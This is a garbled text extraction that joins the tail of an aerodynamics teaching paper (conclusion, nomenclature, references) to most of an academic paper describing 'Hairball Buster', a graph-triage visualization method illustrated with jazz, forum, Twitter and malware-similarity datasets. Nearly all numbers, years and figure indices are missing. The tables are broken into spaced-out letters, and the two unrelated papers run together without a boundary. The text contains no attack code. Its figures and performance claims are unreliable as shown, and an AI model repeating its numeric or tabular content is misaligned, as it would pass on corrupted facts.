different data trials: the theoretical manual calculations, cfd simulation, and scale model wind tunnel test. these various paths allowed us to better understand different means of data acquisition for airfoils, and helped affirm validity in our design process. overall, a trend can still be seen in these two sets of data: a positive correlation between drag and lift as a function of angle of attack. as angle of attack increases, so do both drag and lift. this makes sense because as the plane pitches up more surface area is in contact with the flow, causing more drag. but at the same time, the increased angle of attack on the airfoil creates a greater pressure drop because the air moves faster over the top of the wing, attributing to more lift. it is concluded that this project-based learning has improved and accelerated students understanding of aerodynamic concepts and involved students in a constructive exploration american journal of engineering research (ajer) w w w . a j e r . o r g page e - endurance r - range c cruise - specific fuel consumption c loiter - loitering specific fuel consumption v - cruise velocity l - lift force d - drag force w empty - average weight empty w crew - average weight of crew w payload - average weight of payload w max - average maximum weight l f - fuselage length s f - fuselage area s wing - wing area s wet - aircraft wetted area s ht - horizontal tail area ht - horizontal tail l ww - wing weight q - dynamic pressure c lmax - max lift coefficient of wing c l - lift coefficient of wing c - lift coefficient of airfoil ar - aspect ratio b - wing span t - thrust references [ ]. anderson, jr., j.d., , introduction to flight, mcgraw-hill, seventh edition [ ]. j.j. bertin, aerodynamics for engineers, th ed., prentice hall, . [ ]. kuethe, a.m. and chow, c.-y., foundations of aerodynamics, th ed., wiley, [ ]. houghton, e.l. and carruthers n.b., aerodynamics for engineering students, rd ed., arnold, [ ]. daniel p.raymer,“aircraft design: aconceptual approach”, published by american institute of aeronautics and astronautics,inc. [ ]. gennarozuppardi, luigi g. napolitano, “teaching aerodynamics using a microcomputer”, computers & education, volume , issue , , pages – [ ]. mark drela, “assorted views on teaching of aerodynamics”, th aiaa applied aerodynamics conference, , aiaa- - connections issue | vol. article | doi: . /connections- . hairball buster: a graph triage method for viewing and comparing graphs patrick allen,* mark matties and elisha peterson johns hopkins university applied physics laboratory, laurel, md. *e-mail: patrick.allen@jhuapl.edu abstract hairball buster (hb) (also called node-neighbor centrality or nnc) is an approach to graph analytic triage that uses simple calculations and visualization to quickly understand and compare graphs. rather than displaying highly interconnected graphs as ‘hairballs’ that are difficult to understand, hb provides a simple standard visual representation of a graph and its metrics, combining a monotonically decreasing curve of node metrics with indicators of each node’s neighbors’ metrics. the hb visual is canonical, in the sense that it provides a standard output for each node-link graph. it helps analysts quickly identify areas for further investigation, and also allows for easy comparison between graphs of different data sets. the calculations required for creating an hb display is order m plus n log n, where n is the number of nodes and m is the number of edges. this paper includes examples of the hb approach applied to four real-world data sets. it also compares hb to similar visual approaches such as degree histograms, adjacency matrices, blockmodeling, and force-based layout techniques. hb presents greater information density than other algorithms at lower or equal calculation cost, efficiently presenting information in a single display that is not available in any other single display. keywords graph analytic triage, node-neighbor centrality, standard canonical form for graphs, comparing graphs. purpose and overview the purpose of this paper is to describe a new method for analyzing relationships among nodes in a graph using a canonical representation that also enables comparison between different graphs. the approach is called ‘node-neighbor centrality’ (nnc), or more colloquially, ‘hairball buster’ (hb). hb computes a centrality measure (such as node degree) for a node and its neighbors, and presents this computation in an efficient, standardized visual form that scales to very large graphs. using the visual depiction of the measure, an analyst can quickly answer questions such as whether the graph is (generally) from a social network or a random graph. additionally, the depiction retains information about relationships, so an analyst can also quickly determine whether high-degree nodes are connected to each other directly or through a mutually adjacent node, such as in a bipartite graph. this paper presents examples of the hb approach addressing five types of analytic questions using four real-world data sets. hb is a canonical approach using node degrees that allows for comparison of different graphs, while extensions of hb include the display of selected graph attributes such as link weights. the use of alternative measures of centrality is also presented. the approach is compared and contrasted with other common graph algorithms. the paper concludes with the limitations of the hb approach and future planned features and applications. the hb python code is available at https://github. com/patallen /hairball-buster. © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). hairball buster: a graph triage method for viewing and comparing graphs the need the most commonly used graph visualization techniques include node-link visualizations that embed a graph’s nodes and links in two-dimensional space, and adjacency matrix visualizations that show the entire space of possible connections in a large matrix. each of these techniques has a number of advantages and disadvantages (ghoniem et al., ). a particularly challenging case is graphs that have so many elements and interconnected features that it becomes difficult to determine which nodes and links are most ‘important.’ when using standard graph visualization algorithms such as force-directed (kamada and kawai, ; fruchterman and reingold, ) or dimensional reduction, the usual starting point is a depiction of all nodes and links. for many kinds of graphs, especially those with high connectivity, this results in a ‘hairball’ as shown in figure , which shows a link between every pair of jazz musicians that have performed together (gleiser and danon, ). the purpose of graph visualization is to help an analyst understand features of the graph or a particular node, using visual queries (freeman, ; peterson, ; ware, ). however, in this typical ‘hairball,’ it is difficult to determine at a glance the nodes with the highest degree, the distribution of nodes by degree, and whether the highest degree nodes are directly connected to each other. an analyst needs to apply a range of other algorithms to further dissect the graph, sometimes requiring multiple iterations, to determine how the various nodes relate to each other. in addition, there are a number of additional challenges that arise when visualizing graphs that change over time (bender-demoll and mcfarland, ; peterson, ). there is a tendency in force-directed visualization for nodes and links to reposition themselves, every time new nodes or links are added or removed. this makes it difficult not only to identify key nodes, but to track them over time. a number of approaches have been suggested, but they do not fully address the issue and are computationally expensive (bender-demoll and mcfarland, ; brandes and corman, ; moody et al., ; peterson, ; zweig, ). an alternative approach is the backbone layout, which attempts to directly resolve difficulties in visualizing particularly dense portions of a force- directed layout (lehmann and kottler, , nocaj et al., , ). figure shows the same data set using visone’s quadrilateral simmelian backbone layout. while the big hairball of figure has been broken up into four clusters, one large hairball has turned into several smaller hairballs. one still cannot answer many questions of interest to a data analyst, e.g. which nodes have the highest degree or how nodes of high degree are connected to each other. there is also an inherent performance cost when generating force-directed graph displays, most of which are at a minimum order n , where n is the number of nodes (fruchterman and reingold, ). because of the challenges in visualizing node- link diagrams in these cases, alternatives, such as an adjacency matrix visualization, are often proposed (sheny and maz, ). adjacency matrices also can be a very effective way to visualize clusters, so they are often used when studying communities, sometimes referred to as clustering or blockmodeling (wasserman and faust, ; white et al., ). in one study, the authors found that the adjacency matrix is almost always superior for a certain set of tasks to the node- link diagram (ghoniem et al., ). however, the authors did not include any graphs with more than nodes in their study, and this is the principle drawback of adjacency matrix visualizations: they do not scale well to graphs with thousands or millions of nodes. hb approach hb is a new way of looking at graph data that scales effectively to large, dense graphs. the approach is simple to calculate and plot, and provides an easy way to identify by inspection the most connected nodes and most important links in the graph. assume there is a graph with n nodes and m links. the degree of each node is the number of links connected to that node. (throughout this paper, we will use degree as our primary measure of centrality, figure : sample ‘hairball’ showing jazz players that performed with each other. connections although hb representations of other centrality measures are presented later.) there are six steps to creating the hb plot as follows: . calculate the centrality (degree) of each node (which requires m calculations). . sort the nodes by degree, assigning ranks from (the highest degree node) to n (which requires n log n calculations). . plot (in one color) the monotonically decreas- ing curve of degree (vertical axis) vs. node rank (horizontal axis). (there will be n points on this curve, one for each node.) call this ‘the curve’ and the nodes on it ‘curve nodes.’ . calculate the neighbors of each node and place each neighbor on a list associated with each ranked node. (the placement of the neighbor on the list of neighbors for each node is accomplished during the initial m calcula- tions in step .) . store the degree of the neighbor with the neighbor node. (this step uses an index for each node so that the degree of the neighbor is an indexed look-up.) . for each node, plot (in another color) the value of each of its neighbor’s degrees on the verti- cal line at the same horizontal position as that node, so that each of its neighbors will be rep- resented above or below that node’s position on the curve. call these the ‘neighbor nodes.’ optional calculations, such as ensuring canonicalization and parallelization, and display options for log–log, semi–log, inverse, and same degree offsets, are pre- sented in section ‘optional steps of the hb algorithm.’ the computational efficiency of hb is on the order of m + n log n. in contrast, traditional graph displays that look like the hairball shown in figure require order n (fruchterman and reingold, ). in addition, some algorithms only sample the graph data set, while the hb approach deals with the whole data set in one pass (squartini et al., ). see section ‘hb measures of performance’ for further details. in addition to computational efficiency, hb uses visual space more efficiently than an adjacency matrix, making it suitable for graphs of any size. it supports many of the same visual queries as an adjacency matrix, with the additional advantage that it can highlight not just a node’s neighbors or clusters, but also how a node’s centrality measure relates to those of its neighbors. in the remainder of this paper, these advantages are described in more detail by analyzing several real-world sample graphs. first application: quickly identifying key nodes and relationships in a graph this section uses the jazz data set to illustrate how hb can answer common analytic questions about figure : visone backbone layout of jazz player data set. hairball buster: a graph triage method for viewing and comparing graphs which nodes have the highest degree and how these are connected to other types of nodes. figure depicts the degree curve (step , above). note that there are four very high-degree nodes in the upper-left-hand corner. the rest of the nodes follow a fairly linear path from upper left to lower right. (this pattern is typical for social networks.) figure displays the neighbors of the curve nodes (steps , , and above). each red dot represents one or more links on a traditional graph display. the dot’s vertical position indicates the node at one end of the link and its horizontal position indicates the node at the other end. for example, the red dot at coordinate ( , ) is the link between figure : sample hb curve for jazz players that performed with each other. figure : neighbors plot for jazz players that performed with each other. connections the first and second nodes on the curve (first two blue dots). this curve is not quite the same as a histogram or node-degree distribution, where one dot represents many nodes of the same degree. as with node- degree curves, the shape can be useful for comparing different graphs. however, hb displays one dot for each node, since the horizontal axis is the degree rank of the node. this is an important distinction, because hb retains connectivity information about individual nodes that other techniques do not and can therefore answer a much broader class of questions. it can also address additional questions that an adjacency matrix cannot, as will be summarized later. unlike the backbone layout display, the hb chart clearly shows which nodes have highest degree, how much higher their degree is than other nodes, whether the highest degree nodes are directly or indirectly connected to other high-degree nodes, and how high- degree nodes tend to connect to low-degree nodes. this is summarized in figure . for instance, using the hb visual for jazz players in figure , the top nodes are all clearly connected to each other (forming a fully connected subgraph), since there is a red dot on the same row and column as the three blue dots representing the eight highest degree nodes on the curve. for example, the highest degree node (rank , degree ) is connected to the second highest ranked node (rank , degree ), indicated by the red dots plotted at rank /degree and rank /degree . this pattern continues with the remainder of the top nodes. this specific kind of connectivity information cannot be determined from a backbone or a histogram display. second, the highest degree jazz players rarely performed with the lowest-degree jazz players, as shown by the gaps in the far side of the upper right quadrant, which increase in frequency and length as the rank increases to the right. this means that the number of lower-ranked musicians with whom the most connected musician performed is small. third, there are few dots near the bottom of the chart. this shows that jazz players who have performed with many others have tended to perform with other jazz players who have also performed with many others, and not with those who have performed with few. in general, the upper-left ‘quadrant’ or section of figure shows which high-degree nodes are mutually connected to other high-degree nodes. if some of the highest degree nodes are not connected with each other, this can indicate that there are different clusters of nodes around some of the high- degree nodes (an observation that can be made without running a clustering algorithm). conversely, if the highest degree nodes are mostly directly connected to each other, this provides a different pattern around a core group to analyze further. in the upper right and lower left quadrants, it is easy to see which high-degree nodes connect with lower-degree nodes and which do not. a high-degree node with many connections to one-degree nodes indicates a common star pattern on traditional graph displays. however, if one finds the highest degree nodes are connected to low-degree nodes rather than each other, then one may have a bipartite graph or other distinguishing feature. the lower right quadrant shows which lower- degree nodes connect with each other. if this area is sparse or empty, then the lower-degree nodes are only connecting with the higher-degree nodes. this is indicative of a star-like shape for some of the high- degree nodes. the visual can also be used to find nodes that are indirectly connected via an intermediate node. if two nodes a and b have a common neighbor c, then c will be depicted as a neighbor node on the same horizontal line above or below each of a and b. figure shows how the hb chart can appear for a directed graph. in this example, we randomly assigned a direction to the jazz player data set, where green indicates an ‘in’ link to the node in that row, while red indicates an ‘out’ link. the jazz player data set consisted of undirected links, and this figure just shows how directed graphs would appear if the links were directed. second application: quickly identifying core groups or multiple groups this section shows how hb can quickly determine whether there is a single core group or multiple core groups in a data set. this example uses toaster figure : questions addressed by location of neighbor nodes. hairball buster: a graph triage method for viewing and comparing graphs figure : sample directed neighbors plot for jazz player data set (green = in, red = out). (toster dot ru), which is a russian social media site for software support and help from a community of subject matter experts (smes). it is similar to the popular stackoverflow site, but the toaster data set is smaller and provides a form of ground truth in terms of user-provided tags for purposes of comparison. the toaster data have a set of threaded discussions where a person posts a question, someone else posts an answer (usually an sme), and then others can comment on both the question and the answer. the data set at the time of download had over , nodes, , , edges, and over , discussions. initial work by others at apl examined how to find figure : force-directed representation of the toaster data set. sub-communities within the larger community represented by the toaster data set. see figure for a traditional force-directed visualization of the toaster data set. this image definitely qualifies as a hairball! as shown in figure , the backbone layout did not produce more informative results. to apply the hb approach to this data set, we first removed duplications and focused entirely on whether any username in the data set communicated with any other username in the data set. the analytic question we are asking is ‘who are the core members, and are there any large communities with unique core members?’ while the original data set had , nodes and almost million edges, the de-duped data set had , nodes and , edges. figure shows the hb representation of the nearly , nodes. focusing on the highest-ranked nodes, the top can be readily identified, while the remaining are difficult to visually distinguish. each of the top-ranked nodes appears to connect to all the other high-ranked nodes, and the first obvious visual gaps occur at around , nodes. this indicates that the top-ranked nodes are either fully connected or very nearly fully connected. while displaying the full data set provides the information described above for the first nodes, it does not definitively indicate whether the highest degree nodes are fully connected, or whether they belong to separate clusters due to visual occlusion. to address this limitation, it helps to view the ‘inverse’ of the neighbors – that is, to display the connections figure : backbone layout representation of the toaster data set. figure : hb representation of the toaster data set (directionality ignored). missing links (the gaps), and to zoom in on the top nodes. (zooming in on the display adds no additional computational penalty beyond rendering.) when there are no dots in the inverse, the graph is fully connected. figure shows this inverse display zoomed in on the first nodes. it appears that the top nodes are almost, but not quite, fully connected. figure zooms in further on just the top nodes, again showing the ‘inverse’ neighbors. it is clear that nodes through are fully connected and that nodes through are almost fully connected. hairball buster: a graph triage method for viewing and comparing graphs figure : hb representation of the inverse of neighbor nodes (e.g. gaps). figure : hb inverse representation of just the top ranked nodes with each other in toaster data set. note that zooming in on the inverse neighbors was a simple way to gain a more definitive understanding of the graph while incurring virtually no additional computational cost. in summary, using our triage approach based on hb, we can quickly see that the top-ranked smes in the toaster data set have all commented on, or been commented on, by each other, and the top nearly so. this means that there is likely to be just one core group in the toaster community all connected with each other. in contrast, it takes more than one algorithm and manual steps to provide similar data. for example, we ran a histogram on the toaster data set, which connections while k-truss is not available in gephi, it is useful in identifying clusters in data sets. however, when the top nodes are fully or nearly fully connected, the k-truss algorithm will not provide additional useful information about these nodes. third application: hb and temporal graphs a significant benefit of the hb chart approach is that the canonical format allows multiple curves/ graphs to be compared at once. as an example, we divided the toaster data set into blocks of , connections representing approximate slices of the data set over time (since the initial data set was in roughly chronological order). we then compared the hb depictions of the first , node connections with the second and third blocks. figures to show these three batches of nodes and links plotted with the same axis scales for ease of comparison. in figure , there is one node above degree , which is a much higher degree than any of the other nodes. the next highest node is around , followed by a couple at and then a fairly smooth curve toward the lowest degrees. figure shows that in this next time period, the -degree node is the highest-ranked node and the -degree nodes are still present, but there is also an interesting bump in the curve around degree . figure also has a figure : force atlas on top nodes in toaster data set. identified the top to nodes as having the highest degree. we then ran gephi, ranking the nodes by degree and manually copied the top nodes to visualize using force atlas . figure shows the results using degree as the node label. while the process took roughly min, hb provided the results in sec for the initial display and then for the inverse display. the gephi example does show highly connected nodes, but does not conclusively show which are fully connected, and required greater time and calculation cost than hb. figure : hb chart of first , connections in toaster data set. hairball buster: a graph triage method for viewing and comparing graphs figure : hb chart of third , connections in toaster data set. figure : hb chart of second , connections in toaster data set. maximum degree node at , but also one at , , and . this third set of , connections also has a ‘bump’ in the curve around degree that is similar to the bump in figure . in typical node-link visualizations, visualizing changing graphs compounds many of the issues associated with visualizing static graphs. in addition, there are new forms of ‘visual noise’: nodes/edges that are displayed or removed without warning, and nodes/edges that move rapidly from one time period to the next without warning (peterson, ). many approaches have been suggested to address these connections issues, but they are computationally expensive and only work well in limited cases (bender-demoll and mcfarland, ; brandes and corman, ; moody et al., ; peterson, ; zweig, ). in contrast, the hb approach is computationally inexpensive and high in information content. hb does not address all of these issues, but allows the analyst to focus on how the centrality of a specific node changes over time, or how the distribution of centrality changes over time. for example, does the shape of the curve change over time? this is shown in figures to for the toaster data set. does the rank of each node change over time? this can be added in a later version of the hb code. see section ‘future features and applications of hb’ for such an approach. fourth application: identifying anomalous features this section describes how hb can be used to quickly identify selected anomalous features in a data set associated with the highest degree nodes, using suspended iranian twitter™ accounts obtained from https://about.twitter.com/en_us/values/elections- integrity.html#data (twitter™, ). this data set for user-id replies with no retweets between nodes included , nodes and , edges. figure was calculated in about sec on a single- threaded laptop, and shows that one node dominated with over , replies. the next two highest nodes had around , replies and just under , replies, respectively. (displaying over , nodes and , links would not be feasible in an adjacency matrix. see section ‘comparing hb to other algorithms’ for comparisons to both the adjacency matrix and blockmodeling.) figure shows how much larger the degree of highest node is compared to all other nodes, as well as for the second and third degree nodes. more importantly, this figure shows an interesting pattern in gaps in the reply pattern of these top nodes, as well as the highest of the next lower- degree-ranked nodes. for example, the highest degree mode appears to connect with most of the rest of the nodes except around nodes ranked at k, while the second highest degree node has multiple gaps and the third highest degree node does not appear to connect with about half the nodes. zooming in on the left-hand side, figure shows the same data limited to the first nodes. note that the three top-ranked nodes connected with each other and many other nodes, but did not connect with the next highest-ranked nodes except in one case. what is the reason for such an unusual pattern? the authors do not know for sure, but it may be that nodes through are bots run by a different team than those running the first three nodes. (of the th through th nodes, the th node communicated with most of the other nodes, but most of the rest of the nodes did not communicate with each figure : hb chart of suspended iranian twitter™ accounts, user-id replies, and no retweets. hairball buster: a graph triage method for viewing and comparing graphs other.) in any case, hb is an efficient way to quickly identify areas of interest and further investigation into anomalous data without having to slowly whittle down a huge hairball display. this approach might also be useful in helping identify other twitter™ bots in the future based on similar patterns. fifth application: quickly identify nodes connected by highest-value link weights this section shows how hb can be used to identify key relationships in graphs with link weights. this example uses output data from a tool called codedna™, a patented malware analysis tool developed at jhu/apl that provides a fast, reliable, automated means for recognizing related malware binaries and linking variants. it ‘supports crowd- sourcing of information by providing a robust malware identifier (fingerprint) that is deterministic and repeatable for correlating reports, analyses, and other information about attackers, yet cannot be used to re-create the original malware’ (maughan and carlsten, ). by generating dna-like fingerprints from input files, and computing similarity between these fingerprints, codedna™ can effectively identify clusters of related malware in very large data sets. figure shows some samples of clusters of malware previously produced by codedna™. for purposes of this paper, we obtained a data set based on linux coreutils rather than real malware, and figure : hb chart of suspended iranian twitter™ accounts, user-id replies, no retweets, first nodes showing gaps among the top and the next nodes. processed the data through codedna™ software. figure shows the seven clusters produced by codedna™, where each cluster represents elements of the code that have ‘similarity scores’ between . and . . a similarity score is an output of codedna™ that determines how similar one code binary is to another code binary. in figure , the red lines represent a similarity score of . , meaning the code samples are nearly identical. the blue lines represent the score of . , meaning that roughly % of the code is similar according to codedna’s algorithms. the remaining links between the nodes are shaded between blue and red as the similarity score increases. using . as the lowest similarity score that defines a related cluster, figure shows that the outputs divide into seven clusters. to challenge the hb approach, we selected the cluster that had the most nodes ( ) and the most links ( ). this is almost a fully connected graph, which would have links. figure shows the first attempt at displaying this cluster’s data in hb. the problem is that many of the nodes have exactly the same rank, which makes it difficult to discern how the nodes relate to each other. it would also be useful to color code the similarity scores of each edge to provide further detail about how these nodes relate to each other. the solution is to offset the nodes slightly on the vertical in order to allow for each unique link between nodes to be displayed. in figure , nodes with the same degree are increased or decreased by . so that the monotonically decreasing curve is maintained, connections figure : sample chart of codedna™ cluster outputs of malware binaries. and is centered on the original degree value. (if there are more than nine nodes with the same degree, use a smaller offset to fit them in between the next whole number degree rows.) we added a line to connect the nodes to make it easier to see the curve. in addition to the vertical offset, we further color- coded the similarity values of each link or edge. the following colors represent the different ranges of similarity scores: orange = . to , red = . to . , green = . to . , and purple = . to . . note that nodes through have high similarity scores, and a bit less similarity with nodes , , and , even though they share the same degree. nodes through are figure : sample codedna™ cluster outputs of linux coreutils binaries. also similar to the nodes with degree . likewise, nodes through are similar to each other and to the nodes with degree . figure highlights these areas of high similarity by placing purple boxes around them. hb algorithm is canonical the applications above have illustrated how hairball buster can be used to answer key analytic questions. we now move on to a general discussion of the benefits of the approach and how it compares to similar existing techniques. hairball buster: a graph triage method for viewing and comparing graphs figure : sample codedna™ cluster output in standard hairball buster (blue = nodes, gray dots = links). figure : sample codedna™ cluster output in hb with vertical offset. hb is canonical in the sense that each graph has a unique visual representation. this consistency is a significant benefit, allowing different data sets, or different time slices of the same data set as in section ‘third application: hb and temporal graphs,’ to be compared, regardless of size. to ensure uniqueness, the ranking of nodes by degree must be consistent, and this ordering must be chosen at the outset. the simplest way to do this is to assign a unique label to each node and sort them alphanumerically, thus ensuring a canonical display. this was done ‘behind the scenes’ in the above applications. connections another approach is to rank nodes that are tied by having the same degree by their connections to neighbors with the highest rank. for example, all of the one-degree nodes will be ‘tied’ with each other, but a tie-breaker is the degree of the node to which it is connected. if ties still exist after a first pass, then nodes can be ranked by the neighbor’s neighbors. repeat as necessary. if there is still ambiguity between any nodes, simply assign a label to the node and republish the data set so all parties interested in that data set may use the same labels. hb measures of performance many traditional graph layout approaches are computationally intensive because they position each node based on distance relative to every other node and on which nodes share (or are otherwise affected by) links. this n computation means that significant time is required to render a single ‘hairball’ graph with several thousand nodes, and many additional computationally intensive steps may be required to break the hairball into something more readily understandable. in contrast, the hb algorithm has order n log n. for small data sets such as the jazz data set, on a single-threaded laptop there is no noticeable difference in the performance between the two. for large data sets such as the twitter™ data set with over , nodes, however, the difference between n and n log n becomes very significant. table shows experimental results. while the run time is similar for hb and backbone for small data sets, the larger the data set, the better hb performs compared to backbone layout. for k nodes, backbone could not complete in min, whereas hb completed in less than sec. moreover, hb consistently completed for graphs of million nodes in around sec, whereas the backbone algorithm could not be tested because visone could not load this volume of data. the hb approach uses python code to calculate the curves and neighbors from networks defined in standard graphml or csv form. it then creates cartesian plots for the actual visualization. the approach could be probably executed much faster if optimized and parallelized. in hb, every node and neighbor’s location is well defined, easily calculated, and does not change significantly when a new set of nodes or links are added. it does not answer every question, but can identify features that help effectively target what subsets of nodes to use as inputs to more computationally intensive algorithms that do answer deeper questions. hb using other measures of centrality in addition to degree, hb can also display the rank of the nodes by other centrality measures. these expand the type of questions that can be answered by analysts using hb. figure : sample codedna™ cluster output in hb with vertical offset and highlighting nodes with highest similarity scores. hairball buster: a graph triage method for viewing and comparing graphs t a b le . p e rf o rm a n c e c a lc u la ti o n s c o m p a ri so n s fo r h b v s b a c k b o n e la yo u t. d a ta s e ts h b r u n t im e ( s) vi so n e r u n t im e – q u a d s im ( s) vi so n e r u n t im e – t ri s im ( s) f ile n a m e f ile s iz e (b ) n o . o f n o d e s n o . o f e d g e s a vg a vg a vg ra n d o m - - n o d es .g ra p h m l , , , . . . . . . . . . . . . ra n d o m - - n o d es .g ra p h m l , , , , . . . . . . . . . . . . ra n d o m - -n o d es . g ra p h m l , , , , . . . . . . . . . . . . ra n d o m - -n o d es . g ra p h m l , , , , , . . . . . . . . . . . . ra n d o m - -n o d es . g ra p h m l , , , , , . . . . > , ra n d o m - -n o d es . g ra p h m l , , , , , , . . . . v is o n e co u ld n o t lo ad g ra p h m l f ile . in su ffi ci en t m em o ry co d e- d n a. g ra p h m l , < s ec < s ec < s ec < s ec < s ec < s ec < s ec < s ec < s ec ja zz -d ire ct ed . g ra p h m l , , < s ec < s ec < s ec < s ec < s ec < s ec < s ec < s ec < s ec to st er _c a _ e d g e. g ra p h m l , , , , . . . . . . . . . . . . ira n -t w ee t- re p lie s. n o -r et w ee t. b y- u se rid . g ra p h m l , , , , . . . . > , connections node relationships and graph characteristics, (ii) representing large or directed networks or graphs with weighted links, and (iii) the ability to represent other centrality measures and representing graphs in a standard format at low calculation cost. these are used to compare hb with several other techniques: a histogram of node centralities, a standard force- directed layout, a backbone layout, a standard adjacency matrix with nodes sorted by degree, and an adjacency matrix where nodes have been ordered based on clusters (i.e. blockmodeling). the histogram does not provide information about neighbors, connectivity, number of clusters, weighted links, or directedness. similarly, the adjacency matrix cannot represent centrality measures other than degree, has no visual cues for comparing one node’s degree to its neighbors or finding clusters, is not usable for very large data sets, and has no log–log or semi–log representation. (this paper assumes that the adjacency matrix has already been sorted by degree in terms of both rows and columns in order to compare well against hb.) while blockmodeling can depict the number of clusters in a graph, it cannot represent other centrality measures, log–log or semi–log representation, is not canonical, and requires a large number of calculations. moreover, even when successfully representing clusters, blockmodeling works well only when there are several communities highly connected within blocks and having only sparse connections between blocks. blockmodeling requires at least n calculations, and most references cite n calculations being required (white et al., ; wasserman and faust, ; girvan and newman, ; jackson, ; gopalan et al., ). while force-directed and backbone layout visualizations can show some clustering, they cannot provide the distribution of nodes by degree and the we focused on the following measures. the clique count of a node with n neighbors as the count of the n     neighbor pairs that are connected. the clique count (order ) is the number of node pairs within distance of the node that are connected. the decay centrality of a node i is the weighted sum decay (i) = ∑ j≠i δl(i,j), where δ is a decay parameter and l(i,j) is the minimum distance from i to j (or infinite if the nodes are in different components). the betweenness centrality of a node measures how likely the node is to lie along the shortest paths between other nodes in the graph. more details on these centrality measures are available in the studies of wasserman and faust ( ) and jackson ( ). figure shows the hb visual for each of these measures for both the jazz data set and a randomly generated graph. the resulting figures emphasize how a node’s centrality measure is related to those of its neighbors. each chart illustrates major structural differences between the jazz graph and a random graph. for example, in the decay centrality figures, the centrality of neighbors in the jazz data sets differs significantly, whereas in the random graph case the decay centrality of neighbors is very similar (note the vertical axis shows values between and only). these examples also show how hb can be applied to floating point as well as integer-valued metrics. (note that some metric calculations, betweenness centrality in particular, are computationally expensive and may negate some of the performance advantages of the hb approach.) comparing hb to other algorithms this section describes how hb differs from other commonly used graph analytic and visualization algorithms. table lists analytic questions and features grouped into three sections: (i) understanding figure : displaying different measures of centrality in hb. graph degree distribution degree centrality clique count clique count (order ) decay centrality (decay parameter . ) betweenness centrality jazz n = , e = random edges n = , e = . order means displaying the number of triangles in the subgraph formed from all nodes within two hops of the chosen node . betweenness centrality is expensive to compute, so this version of the plot lacks the benefit of fast computation hairball buster: a graph triage method for viewing and comparing graphs t a b le . c o m p a ri n g h b f e a tu re s to o th e r g ra p h a n a ly ti c a n d v is u a liz a ti o n a lg o ri th m s. f e a tu re h a ir b a ll b u st e r h is to g ra m / n o d e -d e g re e d is p la y f o rc e - d ir e c te d v is o n e b a c k b o n e a d ja c e n c y m a tr ix b lo c k m o d e lin g u n d er st an d in g n o d e re la tio n sh ip s an d g ra p h c h ar ac te ris tic s . d is tr ib u tio n o f n o d es b y d eg re e y es y es n o n o n o f n o f . q u ic kl y d et er m in e th e n u m b er o f h ig h -d eg re e n o d es y es y es n o n o y es n o f . q u ic kl y id en tif y w h ic h a re t h e h ig h es t d eg re e n o d es y es y es a n o b n o y es y es . d et er m in e if th e h ig h es t d eg re e n o d es a re d ire ct ly c o n n ec te d t o o th er h ig h -d eg re e n o d es y es n o y es c n o b y es y es . d et er m in e w h et h er t h e h ig h es t d eg re e n o d es a re c o n n ec te d t o ea ch o th er in d ire ct ly v ia t w o h o p s y es n o y es y es c y es y es . d et er m in e w h ic h lo w er -d eg re e n o d es a re d ire ct ly c o n n ec te d t o th e h ig h -d eg re e n o d es y es n o y es y es y es y es . p ro vi d e vi su al c u e o f h o w m u ch d iff er en ce e xi st s b et w ee n t h e d eg re e o f th e n o d es , es p ec ia lly h ig h -d eg re e n o d es y es y es n o n o n o y es . d et er m in e if th er e is o n e ce n tr al c lu st er o r m an y cl u st er s th at co n ta in t h e h ig h es t d eg re e n o d es y es n o y es y es n o y es r ep re se n tin g la rg e o r d ire ct ed n et w o rk s, o r w ith w ei g h te d li n ks . p ro vi d e lo g –l o g o r se m i– lo g r ep re se n ta tio n fo r ve ry la rg e d at a se ts y es y es n o n o n o n o . c an v is u al iz e b o th d ire ct ed a n d u n d ire ct ed g ra p h s y es n o y es e y es e y es y es . d et er m in e w h ic h n o d es c o n n ec t to t h e h ig h es t w ei g h te d li n ks y es n o y es d y es y es g y es g o th er c en tr al ity m ea su re s, s ta n d ar d f o rm at , lo w c al cu la tio n c o st . d is tr ib u tio n o f n o d es b y o th er c en tr al ity m ea su re s y es y es n o n o n o n o . p ro vi d e a ca n o n ic al r ep re se n ta tio n o f th e g ra p h y es y es n o n o y es n o . l o w c al cu la tio n c o st y es y es n o n o y es n o h n o te s: a if d is p la ye d o r av ai la b le v ia t o o lti p d is p la y; b ex ce p t fo r ve ry s m al l d at a se ts ; c fo r sm al l g ra p h s o r w h en e d g e s ar e n o t o cc lu d ed ; d in s o m e ca se s; e if lin k w ei g h ts d is p la ye d , e. g ., b y co lo r o r w id th ; f u n le ss o n e ca n c o u n t n u m b er o f n o d e o r lin ks v er y ca re fu lly ; g if lin k w ei g h ts d is p la ye d a s at tr ib u te s o f d o ts in t h e m at rix ; h o rd er a t le as t n a n d m o st r ef er en ce s st at e n . connections number and identity of highest degree nodes or their direct connectivity to other high-degree nodes except in very small data sets. there are also no visual cues as to how much larger one node’s degree is compared to another high-degree node. moreover, they do not represent other measures of centrality, are not canonical, and require at least n calculation cost. as shown in table , the only algorithms that can come close to the hb analytic triage approach in terms of computation time is the adjacency matrix and the node-degree distribution or histogram display. even then, the histogram cannot address six of the features available in hb, while the adjacency matrix cannot address four. overall, hb efficiently presents information about a graph in a single display that is not available in any other single display. we also compared these approaches visually. figure illustrates five graphs using force-based layout, a histogram, an adjacency matrix, and hb. we have shown in previous sections the variety of questions that can be answered using hb. in contrast, there is little that can be determined directly from the force-based layout except for maybe the preferential attachment graph. while the histogram correlates well with the hb curve, the histogram provides no data whatsoever about the neighbors of the nodes. the adjacency matrix shows little in the way of patterns in these examples, except for the third and fourth graph, although this may be improved by using other node orderings such as those obtained in blockmodeling. an interesting characteristic of hb not previously discussed is also shown in the proximity graph. it is clear from the histogram that the distribution is bimodal, and the adjacency matrix shows a blob in the lower left corner. hb shows not only the cluster in the upper-left corner where most of the high-degree nodes are interconnected, but also that this cluster is mostly disconnected from other parts of the graph; this could not be discovered from the histogram and is difficult to ascertain from the adjacency matrix. optional steps of the hb algorithm section ‘hb approach’ presented the six basic steps of the hb algorithm. this section describes four optional steps mentioned in the previous use cases: . if one requires the hb chart to be canonical, then rank nodes of the same degree in lexico- graphic ordering based on the node labels. . display the inverse (the gaps) of links to the neighbors. . display a log–log or semi–log chart. figure : comparing different types of graphs and algorithms. graph type force-based layout distribution adjacency matrix neighbor-metric plot (hb) jazz n = , e = random edges n = , e = watts-strogatz random graph n = , e = proximity graph n = , e = preferential attachment n = , e = hairball buster: a graph triage method for viewing and comparing graphs . display nodes with the same metric value us- ing vertical offsets. displaying the inverse is performed at the time the chart is rendered. rather than displaying the neighbor nodes at their specified x and y coordinates, display dots where there is no neighbor node, 